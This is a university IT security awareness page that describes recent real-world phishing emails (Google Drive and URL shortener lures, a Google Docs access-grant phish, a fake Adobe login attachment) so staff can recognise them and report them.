ITS Information Security - Phish Pond

Welcome to the Phish Pond. On this page we'll post screenshots of recently encountered real world phishing attacks.  If you need help identifying phishing, sign-up for one of our training sessions, or watch our online training session here.  As always, if you find one, report it to: PhishMeNot@holycross.edu

Account Verify Phish - 2017-06-03

posted Jun 5, 2017, 6:48 AM by Greg Rodenhiser   [ updated Jun 5, 2017, 6:49 AM ]

This phish even directed to a Holy Cross branded login page in an attempt to trick recipients into giving away their login information. 

Phishing attack using Google Drive and McAfee URL shortener for legitimacy.

posted May 19, 2017, 10:32 AM by David Shettler

Attackers are realizing that some of us have been trained to read URL's, and not click on suspicious URL's.

In response they've begun filling their phishing emails with links to more trusted resources, such as Google Drive. Then, in a benign Google Drive share, they link you off to somewhere malicious.  In this case, we see them using McAfee's URL shortener in an attempt to add legitimicy. Thankfully, in this case, McAfee had already shut the link down by the time we could test it, but be aware that this may not always occur.

Moral of the story: don't blindly trust URL shorteners, and if you receive an email with a file share out of the blue that you were not expecting, and that is "out of character", don't click.







New Docusign Phish - 2017-05-15

posted May 15, 2017, 10:25 AM by David Shettler   [ updated May 15, 2017, 10:29 AM ]



New UPS phish - 2017-05-15

posted May 15, 2017, 10:23 AM by David Shettler


2017 - May 5th - Google Docs grant access phish

posted May 3, 2017, 1:54 PM by Greg Rodenhiser   [ updated May 3, 2017, 1:55 PM ]

This was a very sophisticated phish that tricked a user into thinking a document was being shared to them, got user to do a legit login to their Google Account, and then request full access to the GMail account.  Looking at the developer information shows this was not legit. 


2017 - April 29th - Attachment that's an Image with link

posted May 1, 2017, 6:26 AM by Greg Rodenhiser

The attachment in this phish was a single image that was also a web link to a likely malicious site. 


2017 - March 13 - Another Ambiguous Link Phish, Same Day

posted Mar 13, 2017, 8:11 AM by Greg Rodenhiser


2017 - March 13 - Ambiguous Link Phish

posted Mar 13, 2017, 8:01 AM by Greg Rodenhiser


2016 - November 23rd - Google Sheets Share Phish

posted Nov 23, 2016, 8:43 AM by Greg Rodenhiser


2016-11-16 - Attachment-based Phishing Attack

posted Nov 18, 2016, 6:09 AM by David Shettler   [ updated Nov 18, 2016, 6:38 AM ]

Here's one today that went to a group of us today.  Vague, but it got around our filters and Google's filters.

The screenshot doesn't show the attachment, an HTML file that contained malicious javascript.




If you open open the attachment, you'll see this in your browser:


The browser tries to disguise as adobe reader and requests your login credentials, which get submitted to a website in Germany.

1-10 of 61